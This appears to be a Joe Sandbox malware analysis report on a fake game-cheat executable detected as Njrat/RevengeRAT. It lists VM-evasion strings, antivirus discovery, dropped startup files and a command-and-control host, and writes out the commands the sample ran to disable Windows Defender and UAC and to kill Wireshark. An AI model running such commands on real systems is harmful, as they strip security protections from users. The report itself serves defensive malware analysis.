Source: dllhost.exe, 00000029.00000002.2777347353.000000000290B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxServicedS\|lh
Source: dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxServicedS\|l(tn
Source: svchost.exe, 0000001C.00000002.3398339348.000001AAA9C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dllhost.exe, 00000027.00000002.2185454516.0000000002662000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxServicedS\|lt
Source: dllhost.exe, 0000002A.00000002.3335794048.00000000027BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService
Source: svchost.exe, 0000001C.00000002.3394016537.000001AAA462B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dllhost.exe, 00000002.00000002.3861577606.000000000059B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Disables Windows Defender (via service or powershell)

Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc stop windefend
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc stop windefend	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior

Modifies Windows Defender protection settings

Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process created: C:\ProgramData\dllhost.exe "C:\ProgramData\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc query windefend	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop windefend	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc delete windefend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im Wireshark.exe

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im Wireshark.exe

Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000001A.00000002.2012435812.000000000274F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000001A.00000002.2012435812.000000000274F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman*set CDAudio door open.set CDAudio door closed

Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation

Source: C:\ProgramData\dllhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Disables zone checking for all users

Source: C:\ProgramData\dllhost.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

Jump to behavior

Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000002.00000002.3865755977.0000000002662000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000001A.00000002.2012435812.0000000002752000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000001A.00000002.2012435812.000000000274F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.1765475915.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.0000000002552000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.000000000254F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.000000000265F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.0000000002662000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: dllhost.exe, 00000002.00000002.3880743925.00000000074F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: dllhost.exe, 00000002.00000002.3880743925.00000000074F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: dllhost.exe, 00000002.00000002.3880743925.00000000075A6000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000002.00000002.3880743925.00000000074F0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000002.00000002.3888859227.000000000C1A1000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000002.00000002.3861577606.000000000059B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 4940, type: MEMORYSTR

Yara detected RevengeRAT

Source: Yara match

File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 4940, type: MEMORYSTR

Yara detected RevengeRAT

Source: Yara match

File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Windows Service	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	131 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Windows Service	1 Modify Registry	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	221 Registry Run Keys / Startup Folder	12 Process Injection	411 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	221 Registry Run Keys / Startup Folder	1 Access Token Manipulation	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 DLL Side-Loading	12 Process Injection	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Deobfuscate/Decode Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SpeedHack666Cheat (no VM detected).exe	100%	Avira	TR/Dropper.Gen
SpeedHack666Cheat (no VM detected).exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe	100%	Avira	TR/Dropper.Gen
C:\ProgramData\dllhost.exe	100%	Avira	TR/Dropper.Gen
C:\ClickMe.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe	100%	Joe Sandbox ML
C:\ProgramData\dllhost.exe	100%	Joe Sandbox ML
C:\ClickMe.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
order-resident.gl.at.ply.gg	147.185.221.23	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://g.live.com/odclientsettings/Prod/C:	edb.log.28.dr	false	unknown
http://crl.ver)	svchost.exe, 0000001C.00000002.3397450783.000001AAA9C00000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://g.live.com/odclientsettings/ProdV2/C:	svchost.exe, 0000001C.00000003.1710431158.000001AAA9A00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	false	unknown
https://pastebin.com/raw/???	dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.0000000002552000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.000000000254F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.000000000265F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.0000000002662000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000029.00000002.2777347353.0000000002702000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000029.00000002.2777347353.00000000026FF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000002A.00000002.3335794048.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000002A.00000002.3335794048.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.23	order-resident.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533472
Start date and time:	2024-10-14 18:27:05 +02:00
Joe Sandbox product:	CloudBasic
